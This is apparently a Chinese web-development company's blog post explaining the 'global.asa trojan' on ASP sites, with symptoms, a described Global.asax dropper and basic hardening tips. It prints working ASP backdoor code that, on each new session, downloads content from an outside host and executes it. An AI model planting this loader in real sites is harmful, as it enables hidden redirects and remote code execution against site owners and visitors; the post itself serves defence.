什么是global.asa木馬呢?

global.asa在百度百科里是這樣介紹的：

Global.asa 文件是一個可選的文件，它可包含可被ASP 應(yīng)用程序中每個頁面訪問的對象、變量以及方法的聲明。所有合法的瀏覽器腳本都能在Global.asa 中使用。 Global.asa 中，我們可以告知application 和session 對象在啟動和結(jié)束時做什么事情。完成此項任務(wù)的代碼被放置在事件操作器中。

根據(jù)上面的介紹大家應(yīng)該大體了解了，其實這個木馬就是屬于網(wǎng)站程序木馬，也稱：腳本木馬. 但是黑客為什么會以global.asa命名呢?因為這個文件可以調(diào)用很多程序，比如當(dāng)客戶訪問你的網(wǎng)站的時候，可以調(diào)用跳轉(zhuǎn)的命令。正因為global.asa文件作用的特殊性，所以被黑客所利用，并制作成了網(wǎng)站木馬。

首先我們來看下global.asa木馬的代碼：

sub Session_OnStart

On Error Resume Next

url="http://www.********.info:1680/global/xmlfilecode.gif"

Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")

ObjXMLHTTP.Open "GET",url,False

ObjXMLHTTP.setRequestHeader "User-Agent",url

ObjXMLHTTP.send

GetHtml=ObjXMLHTTP.responseBody

Set ObjXMLHTTP=Nothing

set objStream = Server.CreateObject("Adodb.Stream")

objStream.Type = 1

objStream.Mode =3

objStream.Open

objStream.Write GetHtml

objStream.Position = 0

objStream.Type = 2

objStream.Charset = "gb2312"

GetHtml = objStream.ReadText

objStream.Close

set objStream=Nothing

if instr(GetHtml,"by*aming")>0 then

execute GetHtml

end if

end sub

sub Session_OnEnd

end sub

< /script >

我來給大家先解釋一下這個代碼的作用：因為global.asa 文件是網(wǎng)站啟動的文件，當(dāng)一個網(wǎng)站被用戶訪問的時候，會執(zhí)行Application_Start代碼段的內(nèi)容，當(dāng)一個用戶第一次訪問時會執(zhí)行Session_Start代碼段的內(nèi)容，所以此段代碼的作用就是當(dāng)訪問的時候自動下載獲取木馬內(nèi)容，上面遇到的就是跳轉(zhuǎn)性作用的木馬代碼。

global.asa掛馬的癥狀

global.asa文件是隱藏性,你在FTP軟件都看不到，通過地址欄輸入FTP資料，進入網(wǎng)站空間直接可以看到隱藏global.asa的木馬，當(dāng)用戶從百度點擊進來的時候(直接輸入網(wǎng)站地址卻正常)，網(wǎng)站的會自動跳轉(zhuǎn)到其他網(wǎng)站：比如色情站點和有病毒的網(wǎng)站。再就是百度site:自己的網(wǎng)站會發(fā)現(xiàn)收錄了許多色情頁面如下圖所示：

也有些其他的癥狀，例如：網(wǎng)站后臺無法登陸,有的是提示 XX錯誤 然后刷新即可訪問。這都是global.asa 劫持用戶的訪問指向。

global.asa 母級文件Global.asax功能更可怕，我們先看下代碼

<%@ Language="VB"%><%@ Import Namespace="System.IO"%>

其中 if fso.FileExists("\."&Server.MapPath("/Global.asa")) then 判斷 根目錄下 Global.asa 文件是否存在，如果存就將文件屬性改為可讀可寫 代碼：f.Attributes=0 然后進行寫入危險代碼(objwriter.write(CODE2)) 再次將文件設(shè)為只讀，隱藏、系統(tǒng)屬性f.Attributes=1+2+4，你想刪除都沒那么容易。即使你刪除了創(chuàng)建一個文件夾改名為Global.asa也是毫無意義的。它很快把文件屬改掉，覆蓋掉。

global.asa木馬詳細解決方法：

1.要嚴(yán)格控制頁面上傳的代碼,上傳權(quán)限(包括文本編輯器FCKeditor等)重點防御之處.

2.后臺登陸要加上驗證碼,

3.防Sql注入是必須的.

4.密碼要經(jīng)過MD5加密.

5.數(shù)據(jù)庫擴展名改成普通網(wǎng)頁名稱并加密.

6.每個頁面都要進行管理員登陸判斷.

南昌網(wǎng)絡(luò)公司百恒網(wǎng)絡(luò)提醒廣大站長或網(wǎng)絡(luò)公司技術(shù)人員:別忘了要把所有可疑文件全部清除,有的病毒設(shè)置系統(tǒng)屬性,需要服務(wù)器供應(yīng)該商配下,或通過他們完善的后臺進行清理.

詳細解決方案請點擊:南昌網(wǎng)站建設(shè)建議加強網(wǎng)站安全措施

專業(yè),專注于南昌網(wǎng)站建設(shè)、軟件開發(fā),為用戶提供高品質(zhì)的網(wǎng)絡(luò)產(chǎn)品和優(yōu)質(zhì)的服務(wù)是我們始終追求的目標(biāo)!

希望本文對廣大站長和網(wǎng)站建設(shè)公司技術(shù)人員有所幫助，如有不理解之處可以與南昌網(wǎng)站制作公司百恒網(wǎng)絡(luò)技術(shù)部聯(lián)系。